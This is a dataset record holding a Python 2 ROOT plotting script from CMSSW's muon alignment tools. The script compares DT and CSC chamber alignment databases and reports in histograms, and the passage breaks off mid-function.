hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794af37ff41a93fd2e440895579a235dc7cb31d7
| 163,404
|
py
|
Python
|
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
Alignment/MuonAlignmentAlgorithms/scripts/plotscripts.py
|
pasmuss/cmssw
|
566f40c323beef46134485a45ea53349f59ae534
|
[
"Apache-2.0"
] | null | null | null |
import ROOT, array, os, re, random
from math import *
import time
import pickle
# python 2.6 has json modue; <2.6 could use simplejson
try:
import json
except ImportError:
import simplejson as json
# sign conventions and some dimensions
from signConventions import *
# common muon types structures
from mutypes import *
CPP_LOADED = False
# containers for test results for map plots
MAP_RESULTS_SAWTOOTH = {}
MAP_RESULTS_FITSIN = {}
MAP_RESULTS_BINS = {}
# general container for all test results
TEST_RESULTS = {}
#############################################################
# Convenience functions
def wheelm2only(dt, wheel, station, sector): return dt == "DT" and wheel == -2
def wheelm1only(dt, wheel, station, sector): return dt == "DT" and wheel == -1
def wheel0only(dt, wheel, station, sector): return dt == "DT" and wheel == 0
def wheelp1only(dt, wheel, station, sector): return dt == "DT" and wheel == 1
def wheelp2only(dt, wheel, station, sector): return dt == "DT" and wheel == 2
def wheelLetter(wheel):
if wheel == -2: return "A"
elif wheel == -1: return "B"
elif wheel == 0: return "C"
elif wheel == +1: return "D"
elif wheel == +2: return "E"
else: raise Exception
def wheelNumber(wheell):
if wheell == "A": return -2
elif wheell == "B": return -1
elif wheell == "C": return 0
elif wheell == "D": return 1
elif wheell == "E": return 2
else: raise Exception
def mean(xlist):
s, n = 0., 0.
for x in xlist:
s += x
n += 1.
return s/n
def rms(xlist):
s2, n = 0., 0.
for x in xlist:
s2 += x**2
n += 1.
return sqrt(s2/n)
def stdev(xlist):
s, s2, n = 0., 0., 0.
for x in xlist:
s += x
s2 += x**2
n += 1.
return sqrt(s2/n - (s/n)**2)
def wmean(xlist):
s, w = 0., 0.
for x, e in xlist:
if e > 0.:
wi = 1./e**2
s += x*wi
w += wi
return s/w, sqrt(1./w)
#############################################################
tdrStyle = None
def setTDRStyle():
global tdrStyle
tdrStyle = ROOT.TStyle("tdrStyle","Style for P-TDR")
# For the canvas:
tdrStyle.SetCanvasBorderMode(0)
tdrStyle.SetCanvasColor(ROOT.kWhite)
tdrStyle.SetCanvasDefH(600) #Height of canvas
tdrStyle.SetCanvasDefW(600) #Width of canvas
tdrStyle.SetCanvasDefX(0) #POsition on screen
tdrStyle.SetCanvasDefY(0)
# For the Pad:
tdrStyle.SetPadBorderMode(0)
# tdrStyle.SetPadBorderSize(Width_t size = 1)
tdrStyle.SetPadColor(ROOT.kWhite)
tdrStyle.SetPadGridX(False)
tdrStyle.SetPadGridY(False)
tdrStyle.SetGridColor(0)
tdrStyle.SetGridStyle(3)
tdrStyle.SetGridWidth(1)
# For the frame:
tdrStyle.SetFrameBorderMode(0)
tdrStyle.SetFrameBorderSize(1)
tdrStyle.SetFrameFillColor(0)
tdrStyle.SetFrameFillStyle(0)
tdrStyle.SetFrameLineColor(1)
tdrStyle.SetFrameLineStyle(1)
tdrStyle.SetFrameLineWidth(1)
# For the histo:
# tdrStyle.SetHistFillColor(1)
# tdrStyle.SetHistFillStyle(0)
tdrStyle.SetHistLineColor(1)
tdrStyle.SetHistLineStyle(0)
tdrStyle.SetHistLineWidth(1)
# tdrStyle.SetLegoInnerR(Float_t rad = 0.5)
# tdrStyle.SetNumberContours(Int_t number = 20)
tdrStyle.SetEndErrorSize(2)
# tdrStyle.SetErrorMarker(20)
tdrStyle.SetErrorX(0.)
tdrStyle.SetMarkerStyle(20)
#For the fit/function:
tdrStyle.SetOptFit(1)
tdrStyle.SetFitFormat("5.4g")
tdrStyle.SetFuncColor(2)
tdrStyle.SetFuncStyle(1)
tdrStyle.SetFuncWidth(1)
#For the date:
tdrStyle.SetOptDate(0)
# tdrStyle.SetDateX(Float_t x = 0.01)
# tdrStyle.SetDateY(Float_t y = 0.01)
# For the statistics box:
tdrStyle.SetOptFile(0)
tdrStyle.SetOptStat(0) # To display the mean and RMS: SetOptStat("mr")
tdrStyle.SetStatColor(ROOT.kWhite)
tdrStyle.SetStatFont(42)
tdrStyle.SetStatFontSize(0.025)
tdrStyle.SetStatTextColor(1)
tdrStyle.SetStatFormat("6.4g")
tdrStyle.SetStatBorderSize(1)
tdrStyle.SetStatH(0.1)
tdrStyle.SetStatW(0.15)
# tdrStyle.SetStatStyle(Style_t style = 1001)
# tdrStyle.SetStatX(Float_t x = 0)
# tdrStyle.SetStatY(Float_t y = 0)
# Margins:
tdrStyle.SetPadTopMargin(0.05)
tdrStyle.SetPadBottomMargin(0.13)
tdrStyle.SetPadLeftMargin(0.13)
tdrStyle.SetPadRightMargin(0.05)
# For the Global title:
tdrStyle.SetOptTitle(0)
tdrStyle.SetTitleFont(42)
tdrStyle.SetTitleColor(1)
tdrStyle.SetTitleTextColor(1)
tdrStyle.SetTitleFillColor(10)
tdrStyle.SetTitleFontSize(0.05)
# tdrStyle.SetTitleH(0) # Set the height of the title box
# tdrStyle.SetTitleW(0) # Set the width of the title box
# tdrStyle.SetTitleX(0) # Set the position of the title box
# tdrStyle.SetTitleY(0.985) # Set the position of the title box
# tdrStyle.SetTitleStyle(Style_t style = 1001)
# tdrStyle.SetTitleBorderSize(2)
# For the axis titles:
tdrStyle.SetTitleColor(1, "XYZ")
tdrStyle.SetTitleFont(42, "XYZ")
tdrStyle.SetTitleSize(0.06, "XYZ")
# tdrStyle.SetTitleXSize(Float_t size = 0.02) # Another way to set the size?
# tdrStyle.SetTitleYSize(Float_t size = 0.02)
tdrStyle.SetTitleXOffset(0.9)
tdrStyle.SetTitleYOffset(1.05)
# tdrStyle.SetTitleOffset(1.1, "Y") # Another way to set the Offset
# For the axis labels:
tdrStyle.SetLabelColor(1, "XYZ")
tdrStyle.SetLabelFont(42, "XYZ")
tdrStyle.SetLabelOffset(0.007, "XYZ")
tdrStyle.SetLabelSize(0.05, "XYZ")
# For the axis:
tdrStyle.SetAxisColor(1, "XYZ")
tdrStyle.SetStripDecimals(True)
tdrStyle.SetTickLength(0.03, "XYZ")
tdrStyle.SetNdivisions(510, "XYZ")
tdrStyle.SetPadTickX(1) # To get tick marks on the opposite side of the frame
tdrStyle.SetPadTickY(1)
# Change for log plots:
tdrStyle.SetOptLogx(0)
tdrStyle.SetOptLogy(0)
tdrStyle.SetOptLogz(0)
# Postscript options:
tdrStyle.SetPaperSize(20.,20.)
# tdrStyle.SetLineScalePS(Float_t scale = 3)
# tdrStyle.SetLineStyleString(Int_t i, const char* text)
# tdrStyle.SetHeaderPS(const char* header)
# tdrStyle.SetTitlePS(const char* pstitle)
# tdrStyle.SetBarOffset(Float_t baroff = 0.5)
# tdrStyle.SetBarWidth(Float_t barwidth = 0.5)
# tdrStyle.SetPaintTextFormat(const char* format = "g")
# tdrStyle.SetPalette(Int_t ncolors = 0, Int_t* colors = 0)
# tdrStyle.SetTimeOffset(Double_t toffset)
# tdrStyle.SetHistMinimumZero(True)
tdrStyle.cd()
setTDRStyle()
def set_palette(name=None, ncontours=999):
"""Set a color palette from a given RGB list
stops, red, green and blue should all be lists of the same length
see set_decent_colors for an example"""
if name == "halfgray":
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = map(lambda x: 1. - (1.-x)/2., [1.00, 0.84, 0.61, 0.34, 0.00])
green = map(lambda x: 1. - (1.-x)/2., [1.00, 0.84, 0.61, 0.34, 0.00])
blue = map(lambda x: 1. - (1.-x)/2., [1.00, 0.84, 0.61, 0.34, 0.00])
elif name == "gray":
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = [1.00, 0.84, 0.61, 0.34, 0.00]
green = [1.00, 0.84, 0.61, 0.34, 0.00]
blue = [1.00, 0.84, 0.61, 0.34, 0.00]
elif name == "blues":
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = [1.00, 0.84, 0.61, 0.34, 0.00]
green = [1.00, 0.84, 0.61, 0.34, 0.00]
blue = [1.00, 1.00, 1.00, 1.00, 1.00]
elif name == "reds":
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = [1.00, 1.00, 1.00, 1.00, 1.00]
green = [1.00, 0.84, 0.61, 0.34, 0.00]
blue = [1.00, 0.84, 0.61, 0.34, 0.00]
elif name == "antigray":
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = [1.00, 0.84, 0.61, 0.34, 0.00]
green = [1.00, 0.84, 0.61, 0.34, 0.00]
blue = [1.00, 0.84, 0.61, 0.34, 0.00]
red.reverse()
green.reverse()
blue.reverse()
elif name == "fire":
stops = [0.00, 0.20, 0.80, 1.00]
red = [1.00, 1.00, 1.00, 0.50]
green = [1.00, 1.00, 0.00, 0.00]
blue = [0.20, 0.00, 0.00, 0.00]
elif name == "antifire":
stops = [0.00, 0.20, 0.80, 1.00]
red = [0.50, 1.00, 1.00, 1.00]
green = [0.00, 0.00, 1.00, 1.00]
blue = [0.00, 0.00, 0.00, 0.20]
else:
# default palette, looks cool
stops = [0.00, 0.34, 0.61, 0.84, 1.00]
red = [0.00, 0.00, 0.87, 1.00, 0.51]
green = [0.00, 0.81, 1.00, 0.20, 0.00]
blue = [0.51, 1.00, 0.12, 0.00, 0.00]
s = array.array('d', stops)
r = array.array('d', red)
g = array.array('d', green)
b = array.array('d', blue)
npoints = len(s)
ROOT.TColor.CreateGradientColorTable(npoints, s, r, g, b, ncontours)
ROOT.gStyle.SetNumberContours(ncontours)
set_palette()
######################################################################################################
## sector phi edges in: me11 me12 me13 me14 me21 me22 me31 me32 me41 me42 mb1 mb2 mb3 mb4
## index: 0 1 2 3 4 5 6 7 8 9 10 11 12 13
#phiedgesCSC36 = [pi/180.*(-175. + 10.*i) for i in range(36)]
#phiedgesCSC18 = [pi/180.*(-175. + 20.*i) for i in range(18)]
phiedgesCSC36 = [pi/180.*(-5. + 10.*i) for i in range(36)]
phiedgesCSC18 = [pi/180.*(-5. + 20.*i) for i in range(18)]
phiedges = [
phiedgesCSC36,
phiedgesCSC36,
phiedgesCSC36,
phiedgesCSC36,
phiedgesCSC18,
phiedgesCSC36,
phiedgesCSC18,
phiedgesCSC36,
phiedgesCSC18,
phiedgesCSC36,
[0.35228048120123945, 0.87587781482541827, 1.3994776462193192, 1.923076807996136, 2.4466741416203148, 2.970273973014216,
-2.7893121723885534, -2.2657148387643748, -1.7421150073704739, -1.2185158455936571, -0.69491851196947851, -0.17131868057557731],
[0.22000706229660855, 0.74360690430428489, 1.267204926935573, 1.7908033890915052, 2.3144032310991816, 2.8380012537304697,
-2.9215855912931841, -2.3979857492855081, -1.8743877266542202, -1.3507892644982882, -0.82718942249061178, -0.30359139985932365],
[0.29751957124275596, 0.82111826253905784, 1.3447162969496083, 1.8683158980376524, 2.3919145893339548, 2.915512623744505,
-2.844073082347037, -2.3204743910507353, -1.7968763566401849, -1.2732767555521407, -0.74967806425583894, -0.22608002984528835],
[3.0136655290752188, -2.7530905195097337, -2.2922883025568734, -1.9222915077192773, -1.5707963267948966, -1.2193011458705159,
-0.84930435103291968, -0.38850213408005951, 0.127927124514574, 0.65152597487624719, 1.1322596819239259, 1.5707963267948966,
2.0093329716658674, 2.4900666787135459]]
def phiedges2c():
lines = []
for ed in phiedges[:]:
ed.sort()
#print ed
ed.extend([999 for n in range(0,37-len(ed))])
lines.append('{' + ', '.join(map(str, ed)) + '}')
#print lines
res = ', '.join(lines)
ff = open("phiedges_export.h",mode="w")
print>>ff,'double phiedges[14][37] = {' + res + '};'
ff.close()
class SawTeethFunction:
def __init__(self, name):
self.name = name
self.edges = (phiedges[stationIndex(name)])[:]
self.ed = sorted(self.edges)
# add some padding to the end
self.ed.append(pi+1.)
self.n = len(self.edges)
def __call__(self, xx, par):
# wrap x in the most negative phi sector into positive phi
x = xx[0]
if x < self.ed[0]: x += 2*pi
# locate sector
for i in range(0,self.n):
if x <= self.ed[i]: continue
if x > self.ed[i+1]: continue
return par[i*2] + par[i*2+1]*(x - self.ed[i])
return 0
def pp(self):
print self.name, self.n
print self.edges
print self.ed
def stationIndex(name):
if ("MB" in name or "ME" in name):
# assume the name is ID
pa = idToPostalAddress(name)
if pa is None: return None
if pa[0]=="CSC":
if pa[2]==1 and pa[3]==1: return 0
if pa[2]==1 and pa[3]==2: return 1
if pa[2]==1 and pa[3]==3: return 2
if pa[2]==1 and pa[3]==4: return 3
if pa[2]==2 and pa[3]==1: return 4
if pa[2]==2 and pa[3]==2: return 5
if pa[2]==3 and pa[3]==1: return 6
if pa[2]==3 and pa[3]==2: return 7
if pa[2]==4 and pa[3]==1: return 8
if pa[2]==4 and pa[3]==2: return 9
if pa[0]=="DT":
if pa[2]==1: return 10
if pa[2]==2: return 11
if pa[2]==3: return 12
if pa[2]==4: return 13
else:
if ("mem11" in name or "mep11" in name): return 0
if ("mem12" in name or "mep12" in name): return 1
if ("mem13" in name or "mep13" in name): return 2
if ("mem14" in name or "mep14" in name): return 3
if ("mem21" in name or "mep21" in name): return 4
if ("mem22" in name or "mep22" in name): return 5
if ("mem31" in name or "mep31" in name): return 6
if ("mem32" in name or "mep32" in name): return 7
if ("mem41" in name or "mep41" in name): return 8
if ("mem42" in name or "mep42" in name): return 9
if ("st1" in name): return 10
if ("st2" in name): return 11
if ("st3" in name): return 12
if ("st4" in name): return 13
def philines(name, window, abscissa):
global philine_tlines, philine_labels
philine_tlines = []
edges = phiedges[stationIndex(name)]
#print name, len(edges)
for phi in edges:
if abscissa is None or abscissa[0] < phi < abscissa[1]:
philine_tlines.append(ROOT.TLine(phi, -window, phi, window))
philine_tlines[-1].SetLineStyle(2)
philine_tlines[-1].Draw()
if "st" in name: # DT labels
philine_labels = []
edges = edges[:]
edges.sort()
if "st4" in name:
labels = [" 7", " 8", " 9", "14", "10", "11", "12", " 1", " 2", " 3", "13", " 4", " 5", " 6"]
else:
labels = [" 8", " 9", "10", "11", "12", " 1", " 2", " 3", " 4", " 5", " 6"]
edges = edges[1:]
for phi, label in zip(edges, labels):
littlebit = 0.
if label in (" 7", " 9", "14", "10", "11"): littlebit = 0.05
philine_labels.append(ROOT.TText(phi-0.35+littlebit, -0.9*window, label))
philine_labels[-1].Draw()
philine_labels.append(ROOT.TText(-2.9, -0.75*window, "Sector:"))
philine_labels[-1].Draw()
if "CSC" in name: # DT labels
philine_labels = []
edges = edges[:]
edges.sort()
labels = [" 1", " 2", " 3", " 4", " 5", " 6", " 7", " 8", " 9", "10", "11", "12", "13", "14", "15", "16", "17", "18",
"19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31", "32", "33", "34", "35", "36"]
#else:
# labels = [" 8", " 9", "10", "11", "12", " 1", " 2", " 3", " 4", " 5", " 6"]
# edges = edges[1:]
for phi, label in zip(edges, labels):
littlebit = 0.
#if label in (" 7", " 9", "14", "10", "11"): littlebit = 0.05
philine_labels.append(ROOT.TText(phi+littlebit, -0.9*window, label))
philine_labels[-1].SetTextFont(42)
philine_labels[-1].SetTextSize(0.028)
philine_labels[-1].Draw()
philine_labels.append(ROOT.TText(0, -0.78*window, "Chamber:"))
philine_labels[-1].SetTextSize(0.035)
philine_labels[-1].Draw()
def zlines(window, abscissa):
global zline_tlines
zline_tlines = []
for z in -401.625, -133.875, 133.875, 401.625:
if abscissa is None or abscissa[0] < z < abscissa[1]:
zline_tlines.append(ROOT.TLine(z, -window, z, window))
zline_tlines[-1].SetLineStyle(2)
zline_tlines[-1].Draw()
zline_labels = []
zline_labels.append(ROOT.TText(-550, -0.9*window, "-2"))
zline_labels.append(ROOT.TText(-300, -0.9*window, "-1"))
zline_labels.append(ROOT.TText(-10, -0.9*window, "0"))
zline_labels.append(ROOT.TText(250, -0.9*window, "+1"))
zline_labels.append(ROOT.TText(500, -0.9*window, "+2"))
for z in zline_labels: z.Draw()
zline_labels.append(ROOT.TText(-600, -0.75*window, "Wheel:")); zline_labels[-1].Draw()
def rlines(disk, window, abscissa):
global rline_tlines
rline_tlines = []
if disk == 1: rl = [150., 270., 480.]
else: rl = [350.]
for r in rl:
if abscissa is None or abscissa[0] < r < abscissa[1]:
rline_tlines.append(ROOT.TLine(r, -window, r, window))
rline_tlines[-1].SetLineStyle(2)
rline_tlines[-1].Draw()
######################################################################################################
def getReportByPostalAddress(postal_address, report):
for r in report:
if postal_address == r.postal_address:
return r
return None
######################################################################################################
def DBMC(database, reports, window=10., windows=None, selection=None, phi=False,
color=ROOT.kBlue-8, style=1, bins=50, normalized=False, getvalues=False, name="", canvas=None, reportdiff=False, inlog=True):
return DBdiff(database, None, reports, None, window, windows, selection, phi, color, style, bins, normalized, getvalues,
name, canvas, reportdiff, inlog)
def DBdiff(database1, database2, reports1, reports2,
window=10., windows=None, selection=None, phi=False, color=ROOT.kBlue-8,
style=1, bins=50, normalized=False, getvalues=False, name="tmp", canvas=None, reportdiff=False, inlog=False ):
tdrStyle.SetOptStat("emrou")
tdrStyle.SetStatW(0.40)
wnd = [window]*6
if windows is not None:
i=0
for w in windows:
wnd[i] = windows[i]
i+=1
global hx, hy, hz, hphix, hphiy, hphiz
if phi:
hx = ROOT.TH1F("%s_phi" % name, "", bins, -wnd[0], wnd[0])
else:
hx = ROOT.TH1F("%s_x" % name, "", bins, -wnd[0], wnd[0])
hy = ROOT.TH1F("%s_y" % name, "", bins, -wnd[1], wnd[1])
hz = ROOT.TH1F("%s_z" % name, "", bins, -wnd[2], wnd[2])
hphix = ROOT.TH1F("%s_phix" % name, "", bins, -wnd[3], wnd[3])
hphiy = ROOT.TH1F("%s_phiy" % name, "", bins, -wnd[4], wnd[4])
hphiz = ROOT.TH1F("%s_phiz" % name, "", bins, -wnd[5], wnd[5])
for r1 in reports1:
if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
if reports2 is None:
r2 = Report(r1.chamberId, r1.postal_address, r1.name)
r2.add_parameters(ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.),
ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.), 0., 0., 0., 0.)
else:
r2 = getReportByPostalAddress(r1.postal_address, reports2)
if r2 is None: continue
found = False
if r1.postal_address[0] == "DT":
if r1.postal_address[1:] in database1.dt:
found = True
db1 = database1.dt[r1.postal_address[1:]]
if database2 is None:
db2 = DTAlignable()
db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
else:
db2 = database2.dt[r1.postal_address[1:]]
else:
# skip ME1/a
if r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
if r1.postal_address[1:] in database1.csc:
found = True
db1 = database1.csc[r1.postal_address[1:]]
if database2 is None:
db2 = CSCAlignable()
db2.x = db2.y = db2.z = db2.phix = db2.phiy = db2.phiz = 0.
db2.xx = db2.xy = db2.xz = db2.yx = db2.yy = db2.yz = db2.zx = db2.zy = db2.zz = 0.
else:
db2 = database2.csc[r1.postal_address[1:]]
if found and r1.status == "PASS" and r2.status == "PASS":
if r1.deltax is not None and r2.deltax is not None and r1.deltax.error is not None and \
r2.deltax.error is not None and (r1.deltax.error**2 + r2.deltax.error**2) > 0.:
delta = db1.x - db2.x
if reportdiff: delta -= r1.deltax.value
if normalized:
fill = delta/sqrt(r1.deltax.error**2 + r2.deltax.error**2) * signConventions[r1.postal_address][0]
else:
if phi:
fill = delta/signConventions[r1.postal_address][3] * 1000. * signConventions[r1.postal_address][0]
else:
fill = delta * 10. * signConventions[r1.postal_address][0]
hx.Fill(fill)
if getvalues not in (False, None):
getvalues["x"].append((fill, 10. * sqrt(r1.deltax.error**2 + r2.deltax.error**2)))
if r1.deltay is not None and r2.deltay is not None and r1.deltay.error is not None and \
r2.deltay.error is not None and (r1.deltay.error**2 + r2.deltay.error**2) > 0.:
delta = db1.y - db2.y
if reportdiff: delta -= r1.deltay.value
if normalized:
fill = delta/sqrt(r1.deltay.error**2 + r2.deltay.error**2) * signConventions[r1.postal_address][1]
else:
fill = delta * 10. * signConventions[r1.postal_address][1]
hy.Fill(fill)
if getvalues not in (False, None):
getvalues["y"].append((fill, 10. * sqrt(r1.deltay.error**2 + r2.deltay.error**2)))
if r1.deltaz is not None and r2.deltaz is not None and r1.deltaz.error is not None and \
r2.deltaz.error is not None and (r1.deltaz.error**2 + r2.deltaz.error**2) > 0.:
delta = db1.z - db2.z
if reportdiff: delta -= r1.deltaz.value
if normalized:
fill = delta/sqrt(r1.deltaz.error**2 + r2.deltaz.error**2) * signConventions[r1.postal_address][2]
else:
fill = delta * 10. * signConventions[r1.postal_address][2]
hz.Fill(fill)
if getvalues not in (False, None):
getvalues["z"].append((fill, 10. * sqrt(r1.deltaz.error**2 + r2.deltaz.error**2)))
if r1.deltaphix is not None and r2.deltaphix is not None and r1.deltaphix.error is not None and \
r2.deltaphix.error is not None and (r1.deltaphix.error**2 + r2.deltaphix.error**2) > 0.:
delta = db1.phix - db2.phix
if reportdiff: delta -= r1.deltaphix.value
if normalized:
fill = delta/sqrt(r1.deltaphix.error**2 + r2.deltaphix.error**2)
else:
fill = delta * 1000.
hphix.Fill(fill)
if getvalues not in (False, None):
getvalues["phix"].append((fill, 10. * sqrt(r1.deltaphix.error**2 + r2.deltaphix.error**2)))
if r1.deltaphiy is not None and r2.deltaphiy is not None and r1.deltaphiy.error is not None and \
r2.deltaphiy.error is not None and (r1.deltaphiy.error**2 + r2.deltaphiy.error**2) > 0.:
delta = db1.phiy - db2.phiy
if reportdiff:
delta -= r1.deltaphiy.value
if abs(delta)>0.02/1000: print r1.postal_address, 1000*delta, "=", 1000*db1.phiy - 1000*db2.phiy, "-", 1000*r1.deltaphiy.value, "... ",1000*db1.phiy , 1000*db2.phiy
if normalized:
fill = delta/sqrt(r1.deltaphiy.error**2 + r2.deltaphiy.error**2)
else:
fill = delta * 1000.
hphiy.Fill(fill)
if getvalues not in (False, None):
getvalues["phiy"].append((fill, 10. * sqrt(r1.deltaphiy.error**2 + r2.deltaphiy.error**2)))
if r1.deltaphiz is not None and r2.deltaphiz is not None and r1.deltaphiz.error is not None and \
r2.deltaphiz.error is not None and (r1.deltaphiz.error**2 + r2.deltaphiz.error**2) > 0.:
delta = db1.phiz - db2.phiz
if reportdiff: delta -= r1.deltaphiz.value
if normalized:
fill = delta/sqrt(r1.deltaphiz.error**2 + r2.deltaphiz.error**2)
else:
fill = delta * 1000.
hphiz.Fill(fill)
if getvalues not in (False, None):
getvalues["phiz"].append((fill, 10. * sqrt(r1.deltaphiz.error**2 + r2.deltaphiz.error**2)))
if not normalized:
if phi:
hx.SetXTitle("#delta_{#phi} position (mrad)")
else:
hx.SetXTitle("#delta_{x'} (mm)")
hy.SetXTitle("#delta_{y'} (mm)")
hz.SetXTitle("#delta_{z'} (mm)")
hphix.SetXTitle("#delta_{#phi_{x}} (mrad)")
hphiy.SetXTitle("#delta_{#phi_{y}} (mrad)")
hphiz.SetXTitle("#delta_{#phi_{z}} (mrad)")
if reportdiff:
if phi:
hx.SetXTitle("#delta_{#phi}(XML) - #delta_{#phi}(report) position (mrad)")
else:
hx.SetXTitle("#delta_{x'}(XML) - #delta_{x'}(report) (mm)")
hy.SetXTitle("#delta_{y'}(XML) - #delta_{y'}(report) (mm)")
hz.SetXTitle("#delta_{z'}(XML) - #delta_{z'}(report) (mm)")
hphix.SetXTitle("#delta_{#phi_{x}}(XML) - #delta_{#phi_{x}}(report) (mrad)")
hphiy.SetXTitle("#delta_{#phi_{y}}(XML) - #delta_{#phi_{y}}(report) (mrad)")
hphiz.SetXTitle("#delta_{#phi_{z}}(XML) - #delta_{#phi_{z}}(report) (mrad)")
else:
if phi:
hx.SetXTitle("#delta_{#phi}/#sigma_{#phi} position")
else:
hx.SetXTitle("#delta_{x'}/#sigma_{x'}")
hy.SetXTitle("#delta_{y'}/#sigma_{y'}")
hz.SetXTitle("#delta_{z'}/#sigma_{z'}")
hphix.SetXTitle("#delta_{#phi_{x}}/#sigma_{#phi_{x}}")
hphiy.SetXTitle("#delta_{#phi_{y}}/#sigma_{#phi_{y}}")
hphiz.SetXTitle("#delta_{#phi_{z}}/#sigma_{#phi_{z}}")
for h in hx, hy, hz, hphix, hphiy, hphiz:
h.GetXaxis().CenterTitle()
h.GetYaxis().CenterTitle()
h.SetFillColor(color)
h.SetLineStyle(style)
if canvas is not None: c = canvas
else: c = c1
if normalized:
fx = ROOT.TF1("fx", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hx.GetEntries()*2.*window/bins), -window, window)
fy = ROOT.TF1("fy", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hy.GetEntries()*2.*window/bins), -window, window)
fz = ROOT.TF1("fz", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hz.GetEntries()*2.*window/bins), -window, window)
fphix = ROOT.TF1("fphix", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphix.GetEntries()*2.*window/bins), -window, window)
fphiy = ROOT.TF1("fphiy", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphiy.GetEntries()*2.*window/bins), -window, window)
fphiz = ROOT.TF1("fphiz", "%g * exp(-x**2/2.)/sqrt(2.*3.1415926)" % (hphiz.GetEntries()*2.*window/bins), -window, window)
for f in fx, fy, fz, fphix, fphiy, fphiz:
f.SetLineWidth(2)
f.SetLineColor(ROOT.kBlue)
for h, f in (hx, fx), (hy, fy), (hz, fz), (hphix, fphix), (hphiy, fphiy), (hphiz, fphiz):
h.SetAxisRange(0, 1.1*max(h.GetMaximum(), f.GetMaximum()), "Y")
c.Clear()
c.Divide(3, 2)
c.GetPad(1).cd(); hx.Draw(); fx.Draw("same")
c.GetPad(2).cd(); hy.Draw(); fy.Draw("same")
c.GetPad(3).cd(); hz.Draw(); fz.Draw("same")
c.GetPad(4).cd(); hphix.Draw(); fphix.Draw("same")
c.GetPad(5).cd(); hphiy.Draw(); fphiy.Draw("same")
c.GetPad(6).cd(); hphiz.Draw(); fphiz.Draw("same")
return hx, hy, hz, hphix, hphiy, hphiz, fx, fy, fz, fphix, fphiy, fphiz
else:
nvar = 6
c.Clear()
if nvar == 4: c.Divide(2, 2)
if nvar == 6: c.Divide(3, 2)
c.GetPad(1).cd(); hx.Draw()
c.GetPad(2).cd(); hy.Draw()
if nvar == 4:
c.GetPad(3).cd(); hphiy.Draw()
c.GetPad(4).cd(); hphiz.Draw()
if nvar == 6:
c.GetPad(3).cd(); hz.Draw()
c.GetPad(4).cd(); hphix.Draw()
c.GetPad(5).cd(); hphiy.Draw()
c.GetPad(6).cd(); hphiz.Draw()
if inlog:
if hx.GetEntries()>0: c.GetPad(1).SetLogy(1)
if hy.GetEntries()>0: c.GetPad(2).SetLogy(1)
if nvar == 4:
if hphiy.GetEntries()>0: c.GetPad(3).SetLogy(1)
if hphiz.GetEntries()>0: c.GetPad(4).SetLogy(1)
if nvar == 6:
if hz.GetEntries()>0: c.GetPad(3).SetLogy(1)
if hphix.GetEntries()>0: c.GetPad(4).SetLogy(1)
if hphiy.GetEntries()>0: c.GetPad(5).SetLogy(1)
if hphiz.GetEntries()>0: c.GetPad(6).SetLogy(1)
return hx, hy, hz, hphix, hphiy, hphiz
def DBMCVersus(quantity, versus, database, reports, window=10., selection=None, color=ROOT.kBlack):
return DBdiffVersus(quantity, versus, database, None, reports, None, window, selection, color)
def DBdiffVersus(quantity, versus, database1, database2, reports1, reports2, windwselection=None, color=ROOT.kBlack):
tdrStyle.SetOptStat("")
domain = []
values = []
errors = []
for r1 in reports1:
if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
if reports2 is None:
r2 = Report(r1.chamberId, r1.postal_address, r1.name)
r2.add_parameters(ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.),
ValErr(0., 0., 0.), ValErr(0., 0., 0.), ValErr(0., 0., 0.), 0., 0., 0.)
else:
found = False
for r2 in reports2:
if r1.postal_address == r2.postal_address:
found = True
break
if not found: continue
found = False
